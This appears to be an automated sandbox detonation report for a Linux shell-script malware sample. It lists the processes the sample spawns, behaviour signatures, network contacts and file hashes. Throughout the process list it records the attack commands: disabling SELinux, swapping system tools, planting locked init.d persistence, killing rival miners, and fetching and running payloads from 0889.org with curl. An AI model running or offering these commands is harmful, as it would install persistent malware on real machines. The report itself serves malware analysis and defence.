[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/bin/mount

[mount]

/bin/grep

[grep -o /proc/[0-9]\+]

/usr/bin/sort

[sort -u]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]

Network

Country Destination Domain Proto
US 1.1.1.1:53 0889.org udp

Files

/etc/sed7Dcv7Z

/etc/init.d/sedshh05b

/etc/init.d/sedXptBrl

/etc/init.d/sed1G2Nou

/etc/init.d/sedKYm7AI

/etc/init.d/sedkEQzHQ

/etc/init.d/sedO2yYB2

/etc/init.d/sedNfkxxe

/etc/init.d/sedqz14Ln

/etc/init.d/sedxXliUx

/etc/init.d/sedEf5nzK

/etc/init.d/sedJgobeX

/etc/init.d/sedQAct27

memory/694-1-0xb6c30000-0xb6c41044-memory.dmp

/etc/init.d/sedxJDWUg

/etc/init.d/sed3w2aIn

/etc/init.d/sedQjVLAv

/etc/init.d/sedjSL3gO

/etc/init.d/sedAWxBX7

/etc/init.d/sed4Pejsj

memory/742-2-0xb6bd9000-0xb6bea044-memory.dmp

memory/764-3-0xb6bfd000-0xb6c0e044-memory.dmp

/tmp/sh-thd.QtKxCq

/etc/init.d/crontabs

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

debian9-mipsbe-20240611-en

Max time kernel

17s

Max time network

19s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /usr/local/sbin/mcron /usr/local/sbin/mcron N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /bin/sed N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/sed7tinrF /bin/sed N/A
File opened for modification /etc/init.d/sedMwLA8Q /bin/sed N/A
File opened for modification /etc/init.d/sed88r4Bk /bin/sed N/A
File opened for modification /etc/init.d/sed2KPZCO /bin/sed N/A
File opened for modification /etc/init.d/sedas3nbc /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedqUuL8d /bin/sed N/A
File opened for modification /etc/init.d/sedvbNyP4 /bin/sed N/A
File opened for modification /etc/init.d/sed0q5Utk /bin/sed N/A
File opened for modification /etc/init.d/sedv6RR3s /bin/sed N/A
File opened for modification /etc/init.d/sedAnGcRa /bin/sed N/A
File opened for modification /etc/init.d/grub /usr/bin/curl N/A
File opened for modification /etc/init.d/sedvdRSWB /bin/sed N/A
File opened for modification /etc/init.d/sedwN5x5f /bin/sed N/A
File opened for modification /etc/init.d/sedoUuasG /bin/sed N/A
File opened for modification /etc/init.d/sedL7L6fV /bin/sed N/A
File opened for modification /etc/init.d/sedkajU1t /bin/sed N/A
File opened for modification /etc/init.d/sedx1ab42 /bin/sed N/A
File opened for modification /etc/init.d/sed2x3uAc /bin/sed N/A
File opened for modification /etc/init.d/sed3ewBKk /bin/sed N/A

Write file to user bin folder

persistence
Description Indicator Process Target
File opened for modification /usr/local/sbin/mcron /usr/bin/curl N/A
File opened for modification /usr/bin/bsd-port/knerl /usr/bin/curl N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/715/cmdline /usr/bin/pkill N/A
File opened for reading /proc/4/cmdline /usr/bin/pkill N/A
File opened for reading /proc/698/cmdline /usr/bin/pkill N/A
File opened for reading /proc/385/cmdline /usr/bin/pkill N/A
File opened for reading /proc/378/cmdline /usr/bin/pkill N/A
File opened for reading /proc/1/status /usr/bin/pkill N/A
File opened for reading /proc/705/cmdline /usr/bin/pkill N/A
File opened for reading /proc/10/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/cmdline /usr/bin/pkill N/A
File opened for reading /proc/705/cmdline /usr/bin/pkill N/A
File opened for reading /proc/320/status /usr/bin/pkill N/A
File opened for reading /proc/111/status /usr/bin/pkill N/A
File opened for reading /proc/4/status /usr/bin/pkill N/A
File opened for reading /proc/76/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/710/cmdline /usr/bin/pkill N/A
File opened for reading /proc/740/status /usr/bin/pkill N/A
File opened for reading /proc/710/status /usr/bin/pkill N/A
File opened for reading /proc/14/status /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/235/status /usr/bin/pkill N/A
File opened for reading /proc/37/status /usr/bin/pkill N/A
File opened for reading /proc/672/status /usr/bin/pkill N/A
File opened for reading /proc/5/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/323/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/status /usr/bin/pkill N/A
File opened for reading /proc/323/status /usr/bin/pkill N/A
File opened for reading /proc/10/status /usr/bin/pkill N/A
File opened for reading /proc/154/cmdline /usr/bin/pkill N/A
File opened for reading /proc/378/status /usr/bin/pkill N/A
File opened for reading /proc/677/cmdline /usr/bin/pkill N/A
File opened for reading /proc/36/status /usr/bin/pkill N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/79/status /usr/bin/pkill N/A
File opened for reading /proc/sys/kernel/osrelease /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/8/cmdline /usr/bin/pkill N/A
File opened for reading /proc/320/cmdline /usr/bin/pkill N/A
File opened for reading /proc/672/status /usr/bin/pkill N/A
File opened for reading /proc/11/status /usr/bin/pkill N/A
File opened for reading /proc/9/status /usr/bin/pkill N/A
File opened for reading /proc/323/status /usr/bin/pkill N/A
File opened for reading /proc/414/status /usr/bin/pkill N/A
File opened for reading /proc/704/cmdline /usr/bin/pkill N/A
File opened for reading /proc/235/status /usr/bin/pkill N/A
File opened for reading /proc/122/status /usr/bin/pkill N/A
File opened for reading /proc/21/status /usr/bin/pkill N/A
File opened for reading /proc/37/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/cmdline /usr/bin/pkill N/A
File opened for reading /proc/121/status /usr/bin/pkill N/A
File opened for reading /proc/356/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/121/status /usr/bin/pkill N/A
File opened for reading /proc/16/cmdline /usr/bin/pkill N/A
File opened for reading /proc/20/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/cmdline /usr/bin/pkill N/A
File opened for reading /proc/111/cmdline /usr/bin/pkill N/A
File opened for reading /proc/6/cmdline /usr/bin/pkill N/A
File opened for reading /proc/668/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.y06k78 /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.zmSXlf /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/bin/mount

[mount]

/bin/grep

[grep -o /proc/[0-9]\+]

/usr/bin/sort

[sort -u]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]

/bin/chmod

[chmod +x /usr/local/sbin/mcron]

/usr/bin/chattr

[chattr +ia /usr/local/sbin/mcron]

/usr/bin/dirname

[dirname /usr/bin/bsd-port/knerl]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/10000 -o /usr/bin/bsd-port/knerl]

/bin/chmod

[chmod +x /usr/bin/bsd-port/knerl]

/usr/bin/chattr

[chattr +ia /usr/bin/bsd-port/knerl]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/grub -o /etc/init.d/grub]

/bin/chmod

[chmod +x /etc/init.d/grub]

/usr/bin/chattr

[chattr +ia /etc/init.d/grub]

/usr/local/sbin/mcron

[/usr/local/sbin/mcron]

Network

Country Destination Domain Proto
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp
US 1.1.1.1:53 0889.org udp
GB 51.143.179.104:80 0889.org tcp

Files

/etc/seduED3iV

MD5 8f111d100ea459f68d333d63a8ef2205
SHA1 077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA256 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512 d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

/etc/init.d/sedqUuL8d

MD5 9b392bac8c24330ad47478a5038ead13
SHA1 6c3050598d168c42dc688cecb77fe478211c3ab9
SHA256 d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f
SHA512 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462

/etc/init.d/sed7tinrF

MD5 ce2de503acc3de02f544571e89d4d717
SHA1 5d767b14666d82389475868f153a38594acce7ae
SHA256 52da7743f31954a5fbe1c312dd4112a671fec9efaa1f9812926a8d97543ba0e2
SHA512 2a0cd9e9cbfa7f5d6a4bfa66eef9200ab5fb12ea645496135a42afa5d2ccd5fb4ae36d306138f1ef2094a512f347bdcdd4780fbd19ade74156c9cd9dfea55440

/etc/init.d/sedMwLA8Q

MD5 03975a59225fad7d7c28e133de85d249
SHA1 6f72b3b528550f16a2109bc9d86004180d7d734f
SHA256 42be3e66d014a04eb1cbccd57b3a4ef2c92b268798e2322ec87582271b9fed65
SHA512 e5b4028bd0ad53b76328f5f124ca9e88b1fc42b3617004a06c0954843a4586fb972763008bb96bd681003e5869952fc2678b65e7e5a5892f95efc618633f006e

/etc/init.d/sedvbNyP4

MD5 510488b5120b580b673a15b75a5498b0
SHA1 0f667545ae788ae46ccc7045dc7975f044a76fd2
SHA256 a4fecda40d06d41cab9892b8c2832d3f41d333d944a91a9bc7334540d1cada26
SHA512 3fdcaea110abc6d7be70f52341ff7f523de70afa571ccdc88cdf6e1fab264cae2f70fa2cd8be0ccaa9de0cae2db9baa6139fb951f78e50a78a7ac1d7afb06821

/etc/init.d/sed0q5Utk

MD5 85d7a3783889ea93dcda2fb488420c1c
SHA1 8edf95b211ad7e8df3ee2a331c4e658e9b746e5c
SHA256 2df15277374dedbff7fb792f22e42a72c75fbfc73414ccc87e07f49d377ad9d0
SHA512 9abf28183e952b372423ec48c3b20cd218cfd76b50138ced0dd1969f7be66e0697cbcaee28d71984c46369ea14f9a62a8061ee992ddc2ca2b186c87b689dc3e9

/etc/init.d/sed88r4Bk

MD5 ec9a7d183ec50837a12aca3f9c95cc27
SHA1 396a23fa1d6e8a871d69786d14fd1ce4e4cba583
SHA256 c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0
SHA512 ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b

/etc/init.d/sedvdRSWB

MD5 0eb380bbeb5db57a59e298a074f1f9f3
SHA1 284b88849b3dfd7f6c02c0d05c77a01292c8a679
SHA256 f1f205d18385e658de4d572d6df84a6ca125895fac42206443bc2b1118b2a6a2
SHA512 428edfbdafa0ee634482ec597ce24cc96f92fcc308016bf3e4bf393711ae028a55c2d656bbfbaddec945a4ba7de17401dba2e432ed7593cbdab97e9de61b4e88

/etc/init.d/sed2KPZCO

MD5 1ca5c0743fa797ffa364db95bb8d8d8e
SHA1 6de496930dfe00e705fa244d77e7dfa2d1c6aef8
SHA256 a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609
SHA512 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f

/etc/init.d/sedx1ab42

MD5 b868200c6e36ef87e27ead9a3ddad2db
SHA1 b1cc85e63d4302b020a4679971b6c363c9392d63
SHA256 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1
SHA512 f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a

/etc/init.d/sed2x3uAc

MD5 82698019c962069b438bd2a82d9fa1e7
SHA1 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305
SHA256 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7
SHA512 dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9

/etc/init.d/sedwN5x5f

MD5 27013efdfe13470845c70a9e00a61fde
SHA1 2b840ac1a1d1b866ba457bd0746144c431e944ad
SHA256 c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0
SHA512 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d

/etc/init.d/sedv6RR3s

MD5 49fbfd237be2a2f09576f1f9374580be
SHA1 e380716a856a90f5643ddd6f3655020fc2f603dd
SHA256 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e
SHA512 b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea

/etc/init.d/sedoUuasG

MD5 08213cf202f2552298f62a007487e01c
SHA1 1f143ee220797f30367d4de9e65ad9ac52fd8ea4
SHA256 0f910b4518e553ac6b77c2942ee0ce753c96189550ee2b501293f7cc936edb5e
SHA512 b3fb6f52c1345aec9d70fa60f8e3f69ad999307f1502cf80c2baac332c9ce6a5ec17c4e5b5759d47a5debb9f3ba913b188611a93bd82946538ed5a019d157c33

/etc/init.d/sedL7L6fV

MD5 019ab1c1cb24b368b0965898746bb122
SHA1 8146b37003a86a1348c6b165b32a247ce6907525
SHA256 deb397fc57b4e2a03e97e5a85889fba9af60aea6021ad1f0030149a81ea31818
SHA512 9366e73bef488b09122ef763b942d258107464ecf6e5f32d70de0514fc3dc9baffb7e60b69bdf45b733f7521ed7b705989b7ac778089cf3958ef2eefe05f738a

/etc/init.d/sedAnGcRa

MD5 338975eb635877703fc066e005f916d9
SHA1 5474296634bf9e527a9a865b0cb182e61a2b66bf
SHA256 89473464fed0e27fe2540620198293adbedac0c6a309dbca7a4bcf99996526f7
SHA512 8ef00dc8893b2c7e3a988e4ffd5b60006591c424bb97c0cfbfe44cf76e94f742fcc7263e86b6608893c0e5cc9d04d28f2404a928a3a87bfb313a3caa4be808c8

/etc/init.d/sedas3nbc

